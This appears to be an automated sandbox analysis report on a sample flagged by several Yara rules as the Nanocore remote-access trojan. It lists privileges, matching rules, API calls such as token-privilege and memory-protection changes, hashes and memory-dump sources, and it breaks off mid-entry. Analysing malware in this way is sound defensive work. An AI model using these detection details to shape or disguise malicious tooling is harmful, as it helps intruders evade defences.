Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0x80000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2636 Parent PID: 2280 vbc.exeCOMMON

Executed Functions

Function 00597489, Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

R]qq, xrefs: 0059754C
R]qq, xrefs: 0059750B

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: R]qq$R]qq
API String ID: 0-3739772065
Opcode ID: 98ab1da8298336dbfec1aad7e7069fa20a648d0cd038a4d349648db047a05930
Instruction ID: e25959977dde68647104bd56d3389d0a4402abba87c16a10c8493b9f55b8cd56
Opcode Fuzzy Hash: 98ab1da8298336dbfec1aad7e7069fa20a648d0cd038a4d349648db047a05930
Instruction Fuzzy Hash: 9331F771E002188FEB18DF6AD84479EBBB7BFC9300F54C0BAD448AB255DB340A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 0028BDF3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0028BE73

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 27dcd579042fbbffc96c416d7aba9ec20485ac4c207e6fe6d33696a3a4c9060c
Instruction ID: af879da45882965ea5ab2e70136b2b169d58aaa1f49df519782ef58c56558615
Opcode Fuzzy Hash: 27dcd579042fbbffc96c416d7aba9ec20485ac4c207e6fe6d33696a3a4c9060c
Instruction Fuzzy Hash: 8121B1755093809FDB238F25DC44B92BFF4EF16310F0884DAE9858B5A3D3719818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004A0006, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004A006D

Memory Dump Source

Source File: 00000004.00000002.2395217001.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 03fb5a83837b1db585bf6b195cde710249110dbeaca05eadc354e6b245c29541
Instruction ID: a2fef1e63e43cd85f2b38ed58c1af78ea7c7786bfe1b8777f7c704600bdf53eb
Opcode Fuzzy Hash: 03fb5a83837b1db585bf6b195cde710249110dbeaca05eadc354e6b245c29541
Instruction Fuzzy Hash: 3511907100D7C0AFD7228F21DC44A52FFB4EF17210F0884DBE9858B663D26AA818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028BE2A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0028BE73

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 21463340ae2743fed85d7062c9e849013d3353bf9078997656e98c97c49b0557
Instruction ID: 98741e9f4994cf3196bc733c2eddf16d70fc8a5f7ce583dfd62c6ce7232bf67e
Opcode Fuzzy Hash: 21463340ae2743fed85d7062c9e849013d3353bf9078997656e98c97c49b0557
Instruction Fuzzy Hash: 3511A036510700DFEB21DF55D884BA6FBE4EF04320F4884AEDE4A8B652D371E414DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004A0032, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004A006D

Memory Dump Source

Source File: 00000004.00000002.2395217001.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: c2e6ed7803df180d196fcd1d88fe73ae494cfaab79fbffe71c85c7377b4ce6d9
Instruction ID: 70104ab79c8f6b63e95f42b78e92acd7eab298c59aa58c8b9c0485913f9dfc78
Opcode Fuzzy Hash: c2e6ed7803df180d196fcd1d88fe73ae494cfaab79fbffe71c85c7377b4ce6d9
Instruction Fuzzy Hash: 0201AD31404700DFEB20CF15E884B22FFA0FF29721F08C49ADE490B612D27AA418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00595160, Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

JG.l, xrefs: 005952A6

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: JG.l
API String ID: 0-4013676639
Opcode ID: 623f32454c8c839ed6a3e1fe4fe5f9f34a2d1688d438ba92f6d21f30fb8ba1a5
Instruction ID: 9d680bc8ddda5d577324dc934b27e93f1e66e94f2606db10569948b34735f396
Opcode Fuzzy Hash: 623f32454c8c839ed6a3e1fe4fe5f9f34a2d1688d438ba92f6d21f30fb8ba1a5
Instruction Fuzzy Hash: EBC15A70D0560ADFDF05CFA4D6849AEFBB1FF89310B249959C406BB210E734AA91DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00593198, Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

1?~, xrefs: 00593213

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: 1?~
API String ID: 0-4217192049
Opcode ID: bc3fbc4da166bf3d6838a465af30b24593c4bc187390a88ad8f967150441bc25
Instruction ID: 2807584a4c8d0787e9d99854f698597eff7003b73f57ff6a967149e4e4ee56c0
Opcode Fuzzy Hash: bc3fbc4da166bf3d6838a465af30b24593c4bc187390a88ad8f967150441bc25
Instruction Fuzzy Hash: 6671C174E01219DFDF44CFE5C984AAEBBB2FF89300F20846AD416AB254DB355A41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0059262A, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

R]qq, xrefs: 005926AB

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: R]qq
API String ID: 0-889367755
Opcode ID: 8ff030eb25ec86259a2f38d7753eca227aef27240edf380d7485a5026d4b5104
Instruction ID: ae1d9f81220be6b1c73ba98a9f0aa58b1660ab7167533035f2abfc49bb154f62
Opcode Fuzzy Hash: 8ff030eb25ec86259a2f38d7753eca227aef27240edf380d7485a5026d4b5104
Instruction Fuzzy Hash: C7312971E056189FEB18CF67D84469EFBF3AFC9300F04C0AAD848AB265DB344A468F51

Uniqueness

Uniqueness Score: -1.00%

Function 005939A0, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d2b9f36c59a094f921294e43676fe453a653deb77817debe7835f0006a4556
Instruction ID: eeebac815a1c3796790562c18e9f9a68ca0f9036f95fe47ba2dc955946a40d94
Opcode Fuzzy Hash: d4d2b9f36c59a094f921294e43676fe453a653deb77817debe7835f0006a4556
Instruction Fuzzy Hash: 6C514A71D08209DFDF08CFA9C8846AEBFB2FF89310F14D56AC055AB252D7344A41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 005942C1, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b54683f50a887131dfb04553cb4cc5f075a6a3a81b5eaa1d41139e3a03d0ec8
Instruction ID: 8ceba5e9f8394fec6831a4bf65426ed3ac08e05a83e75deb4f7ab4ed2ae49c37
Opcode Fuzzy Hash: 7b54683f50a887131dfb04553cb4cc5f075a6a3a81b5eaa1d41139e3a03d0ec8
Instruction Fuzzy Hash: 7921C8B1D006189BEB18CFA7D84479EFBF3AFC9300F14C06AD408AA268DB750945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 005942B1, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80729595152894bdab8eefb531eb10375f634587ffd5b8b41e6a705a0008f016
Instruction ID: e049b213607f532734e82cc416bfb440a4e188846e871aabd70a14741e75b84f
Opcode Fuzzy Hash: 80729595152894bdab8eefb531eb10375f634587ffd5b8b41e6a705a0008f016
Instruction Fuzzy Hash: C311A2B1E016088BEB18CF9BD8442DEFBF3BFC8310F14C06AD409AA228DB3409568F50

Uniqueness

Uniqueness Score: -1.00%

Function 005905A8, Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

:@lq, xrefs: 005906D4
\,), xrefs: 005906BD
\d), xrefs: 00590640, 0059066B, 00590742, 00590762, 0059096B

Memory Dump Source

Source File: 00000004.00000002.2395263485.0000000000590000.00000040.00000001.sdmp, Offset: 00590000, based on PE: false

Similarity

API ID:
String ID: :@lq$\,)$\d)
API String ID: 0-1403227304
Opcode ID: a5fc51ad9859dc06ed4c6e4e3e6a3f0d1da1ce1d80c029e539c8a303fa530d5e
Instruction ID: 736c2b5cf4da630124aad673c7b6df789a6cb7b0d38903a9a8f97997080ce7ec
Opcode Fuzzy Hash: a5fc51ad9859dc06ed4c6e4e3e6a3f0d1da1ce1d80c029e539c8a303fa530d5e
Instruction Fuzzy Hash: 3391D474E01218CFDB14DFA9C994B9DBBF1BF49314F205469D409AB390DB305985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0028AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0028ABD5

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7550d373274b1f19c755dd40d05da81756a312e9f3c34fc40af0be19f67384b6
Instruction ID: b3d965211abe775a84469b540832e3767741eeb71e9169d2b8920ec8e2e00d75
Opcode Fuzzy Hash: 7550d373274b1f19c755dd40d05da81756a312e9f3c34fc40af0be19f67384b6
Instruction Fuzzy Hash: 8D31A272504384AFE722CF11DC45FA7BBACEF05310F08859BF9859B192D665A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0028AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,69C0076A,00000000,00000000,00000000,00000000), ref: 0028ACD8

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 50bb6ef1536d4e23b77ef5006b450c625e256c3704cc51859c5efac4e5d80481
Instruction ID: bffba8de7c92577b613bf2df8339501dbaf8bfc225fa24acfeea4b119051e7f9
Opcode Fuzzy Hash: 50bb6ef1536d4e23b77ef5006b450c625e256c3704cc51859c5efac4e5d80481
Instruction Fuzzy Hash: 2B319175105784AFE722CF21CC45FA2BFA8EF06310F08849BE985CB192D664E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028BB6E, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0028BC15

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 2201ab7f69fbd2cbc51f4ef7e118eedbc582836b804c3b28718df4ef1d911c74
Instruction ID: bcde685b0a834980a154138b63479f88e7909ee468da19ce589e3d62ab458ae8
Opcode Fuzzy Hash: 2201ab7f69fbd2cbc51f4ef7e118eedbc582836b804c3b28718df4ef1d911c74
Instruction Fuzzy Hash: 37318475509784AFE712CF25DC85B56BFA8EF06310F08849EE984CB293D325A909C762

Uniqueness

Uniqueness Score: -1.00%

Function 0028B08D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 0028B10E

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2a87eeadf8ae7d4d5c47af9cd17d2ae9b8e88a399a1d90e6a7439626c9b0c6bc
Instruction ID: 72734b53688668bea22a427c8f0587a60e629eea1c45e89d163163db3ef11e78
Opcode Fuzzy Hash: 2a87eeadf8ae7d4d5c47af9cd17d2ae9b8e88a399a1d90e6a7439626c9b0c6bc
Instruction Fuzzy Hash: D121DA7140D3C06FD313CB258C55B26BFB4EF87610F0981DFE8849B693D225A819C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0028AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0028ABD5

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dbcdd700d5c60e5d9268e540abfb1eb7edece2f2e74b74d6672ecc0316999f8f
Instruction ID: ddfa25d238f38c9550a40c47bd3af4318fa5de15f8551d7669a98703c2dbdeca
Opcode Fuzzy Hash: dbcdd700d5c60e5d9268e540abfb1eb7edece2f2e74b74d6672ecc0316999f8f
Instruction Fuzzy Hash: CD21CF72500304EFFB20EE11DC45F6AF7ACEF04310F04855BF9459A281DA64E9088BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0028BC6C, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0028BCF2

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 37de2eb6bd3f217a48395a294d2d1a5d8eb2e85627d543eaa70fe2bef6400dd3
Instruction ID: 69bed0310c870da1fc4f7cb9be9899dcbf636ac82d2f3cf2b603bac010b352d4
Opcode Fuzzy Hash: 37de2eb6bd3f217a48395a294d2d1a5d8eb2e85627d543eaa70fe2bef6400dd3
Instruction Fuzzy Hash: AC2192B65053819FE712CF25DC85B96BFA8EF16320F0984AAD985CB193E3349814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028BBA2, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0028BC15

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 673ef2265c13dc40769ab86ea75dfaf420fbfb10e77e0f4f27153afb7cf213b9
Instruction ID: f8dbc9d48f5cd10670f12891837d6bef6c9fb7ac7e391de351bed1ba87c35d39
Opcode Fuzzy Hash: 673ef2265c13dc40769ab86ea75dfaf420fbfb10e77e0f4f27153afb7cf213b9
Instruction Fuzzy Hash: D821CD75601304AFE721EF25CC85BA6FBE8EF04310F04846EED498B282D771E804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,69C0076A,00000000,00000000,00000000,00000000), ref: 0028ACD8

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 54cec3ef0302f169120db334a5c4c461d06b3f5e1572d83b1248c5eed146aedc
Instruction ID: 78e4b243975e34dc684841bbb8dde478514a81050a6207b26bbae82e568b1292
Opcode Fuzzy Hash: 54cec3ef0302f169120db334a5c4c461d06b3f5e1572d83b1248c5eed146aedc
Instruction Fuzzy Hash: 96219A79201700AFFB20DF15CC81F66B7ECEF04710F04845AE9059B681DA60E918CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0028B3B9, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0028B435

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 0449c3d74325954b35d222d9cbadb47a0c271ec7f0b115ddcf37b5b3c2b8e0d9
Instruction ID: 75dccc7444ada764f54caa7b054da44d91e238db2c7f11f95006bbb8410537ae
Opcode Fuzzy Hash: 0449c3d74325954b35d222d9cbadb47a0c271ec7f0b115ddcf37b5b3c2b8e0d9
Instruction Fuzzy Hash: D921C3755093809FD722CF15DC55B62BFE8EF16310F08808AED85CB293D365A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028B307, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 0028B378

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: aacc28ad551e33d55d1a3ed8d992be5a37ba3cc9f5110de07ce5f9c18e5445ad
Instruction ID: b07f87a253322a0f9e99269b133ba089f42cec7f95d56ca2b13e3a8e95c9c4e8
Opcode Fuzzy Hash: aacc28ad551e33d55d1a3ed8d992be5a37ba3cc9f5110de07ce5f9c18e5445ad
Instruction Fuzzy Hash: DC2190B55093809FD712CF25DC85B51BFB8EF12314F0980DBE9848F293D265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028B89D, Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0028B911

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 22ef37c13dda75b87962ec9a6741bb7bcd2579cab2d1f1b3b6c139cbb1c2b214
Instruction ID: 51fec7e8cd65dd0de74aeb415af84c9af006ef393d168b425aba045efbab1ee4
Opcode Fuzzy Hash: 22ef37c13dda75b87962ec9a6741bb7bcd2579cab2d1f1b3b6c139cbb1c2b214
Instruction Fuzzy Hash: 3A2193765093809FEB228F25DC54B92FFB4EF06310F0884DEE9C54B563D265A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004A0145, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 004A01B9

Memory Dump Source

Source File: 00000004.00000002.2395217001.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d23ded21519beb4f374aa982158ff6db29f6168c27167513da11c43c1c84e931
Instruction ID: 4eb10516480e17ed29e02753ebd1136a84d49cc5e2ebedd109b1ef5332c3dde2
Opcode Fuzzy Hash: d23ded21519beb4f374aa982158ff6db29f6168c27167513da11c43c1c84e931
Instruction Fuzzy Hash: 33219D715093C09FDB238F25DC54A92BFB4EF17310F0984DBE9858F263D226A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0028A61A

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dec14dcae6f6256c1aa86212c6faad312f07854f50b92905ad7f1caf7309cdc0
Instruction ID: a66eed355eea197957a0d33664f91481f5b2dbdb9fc8bebc6c74f59ed0ebe116
Opcode Fuzzy Hash: dec14dcae6f6256c1aa86212c6faad312f07854f50b92905ad7f1caf7309cdc0
Instruction Fuzzy Hash: 38118475409380AFDB228F55DC44B62FFF8EF56310F0884DAEE858B552D276A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028A65A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0028A6CC

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5997bd5d39ab2208df665ac04097ae6d48d66e7c21927c4d151e704aa5cd0a28
Instruction ID: 46860b0f354a525feaf12fa44adee0123176f46a5bb1681dadf05a9d88a4214b
Opcode Fuzzy Hash: 5997bd5d39ab2208df665ac04097ae6d48d66e7c21927c4d151e704aa5cd0a28
Instruction Fuzzy Hash: C9116D7540D3C49FDB128B25DC95A52BFB4EF17220F0E80DBD9858F1A3D2695908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0028BCAA, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0028BCF2

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: fdf0a27854f83f20e8771f6b2134373c36075c623c44de91bf34d75c13cb19e0
Instruction ID: 6aab75b1f72e7f125b47e4f6ce0ee3160d30a3901fc6a63b150ab20fc2656294
Opcode Fuzzy Hash: fdf0a27854f83f20e8771f6b2134373c36075c623c44de91bf34d75c13cb19e0
Instruction Fuzzy Hash: 42117CBA6112019FEB21DF29DC85B56FB98EB14320F08846ADD49CB282E775E814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0028B3EA, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0028B435

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 806597abaf39eb22819d5239ec0c867104bdbf9829fa7ae0845d8e69d080027b
Instruction ID: 18eaf7fb805b01e92a618a939b42556a5eb274f4563944a933c13dc838ac5eae
Opcode Fuzzy Hash: 806597abaf39eb22819d5239ec0c867104bdbf9829fa7ae0845d8e69d080027b
Instruction Fuzzy Hash: 09018C759117009FEB21EF19D886B22FBE8EB14721F08809DDD498B292D375E814DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0028A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0028A61A

Memory Dump Source

Source File: 00000004.00000002.2395073552.000000000028A000.00000040.00000001.sdmp, Offset: 0028A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9bc5087d8db710a3885dace908af4aebde13a48e21f96cdab8ee4feab65d62ae
Instruction ID: 2c1a7534ef83605f0c80911ad728d23bee9d2aac40bffdab0a5874be20d4850e
